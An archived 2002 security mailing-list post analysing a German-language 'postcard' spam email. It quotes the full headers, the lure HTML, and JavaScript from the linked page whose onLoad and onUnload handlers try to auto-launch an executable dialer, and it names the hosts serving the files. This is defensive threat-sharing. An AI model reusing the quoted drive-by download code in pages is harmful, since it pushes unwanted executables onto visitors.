[Dshield] Weird German Porn Spam?

Brenna Primrose drxlecter at phreaker.net
Mon Nov 18 00:08:47 GMT 2002


I received a suspicious "postcard" e-mail today, and thinking it might
be something similar to the recent "FriendGreetings" scam, I decided to
check it out.  I first followed the link using IE 6, but it came up with
an error.  I then opened it in Opera 6.05 and viewed the source, which
redirects to http://nina.xfiles24.com.futuresite.register.com/
(216.21.224.200) - some sort of a porno-looking card.  The card is
linked to an executable hosted on netmails.com.  I don't accept popups
in either of these browsers by default, but it looks as if a javascript
on this page attempts to automatically launch an .exe: 

<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</HEAD>
<BODY vLink=#9933ff aLink=#9933ff link=#9933ff bgColor=#000080
onUnload="MM_openBrWindow('deine_nina.exe','','')"
onLoad="MM_openBrWindow('deine_nina.exe','','')">

It's probably just a run-of-the mill dialer program, but I don't have a
test machine to mess with it.

A further look at http://www.netmails.com/members/ will attempt to have
you download an executable from pluginaccess.com named
"Browser_Plugin.exe".

The spammer also tries to throw us off by using a bunch of fake IPs in
the message header.  SpamCop traced it back to
213-97-146-10.uc.nombres.ttd.es [213.97.146.10].  I'm just curious if
anyone has seen this one before?  I Googled on this but most of the
things I found were in German.

Thanks,

Brenna

----------------Message and header (trimmed header, but all of the
spammer's details are there)--------------------

Received: from 66.87.118.28 (213-97-146-10.uc.nombres.ttd.es
[213.97.146.10])
	by mx2.phreaker.net (Postfix) with SMTP id C75061B0318
	for <drxlecter at phreaker.net>; Sun, 17 Nov 2002 23:28:49 +0000
(UTC)
Received: from 152.74.145.157 ([152.74.145.157]) by hd.regsoft.net with
esmtp; Nov, 18 2002 00:15:15 +1200
Received: from smtp-server6.tampabay.rr.com ([12.232.159.86]) by
mailout2-eri1.midsouth.rr.com with asmtp; Nov, 17 2002 23:27:33 +1100
Received: from unknown (HELO f64.law4.hotmail.com) (13.61.40.178) by
ssymail.ssy.co.kr with smtp; Nov, 17 2002 22:11:21 +0700
From: Postcard Team <postcard_team at pkard.com>
To: drxlecter at phreaker.net
Cc: 
Subject: Du hast eine Postkarte von Nina bekommen....
Sender: Postcard Team <postcard_team at pkard.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Quarantined-Date: Mon, 18 Nov 2002 00:29:40 +0100
X-Mailer: AOL 7.0 for Windows US sub 118
X-Priority: 1
Message-Id: <20021117232849.C75061B0318 at mx2.phreaker.net>
X-pstn-levels:     (C:75.3595 M:98.9583 P:95.9108 S: 2.6290 )
X-pstn-settings: 5 (2.0000:8.0000) pmCr
X-pstn-addresses: from <postcard_team at pkard.com> 
X-pstn-disposition: quarantine
X-UIDL: 'TD"!-L3"!H$f!!jo#"!

<html>
<head>
<title>Untitled Document</title>

</head>

<body bgcolor="#FFFFFF" text="#000000">
<p>Du hast eine Postkarte bekommen von einem Freund oder der Freundin -
wer weiss? 
  :-))<br>
  Du kannst Deine Karte unter dieser Adresse abrufen:<br>
  <a href="http://nina.xfiles24.com/">Zur Deiner Postkarte</a></p>
<p>Die Karte wird eine Woche auf dem Server zum lesen bereitliegen</p>
<p>Dein Postcard Team<br>
</p>
</body>
</html>

------------------------------------------------------------------------
-----------------------------------

http://profiles.yahoo.com/absolut_contagion 
http://gsa.creighton.edu
AIM - absolutxpsycho
Yahoo! - absolut_contagion
ICQ - 1363187
MSN - r00t at creighton.edu 
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ 
O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ 
G e* h- r++ x+ 
------END GEEK CODE BLOCK------





More information about the list mailing list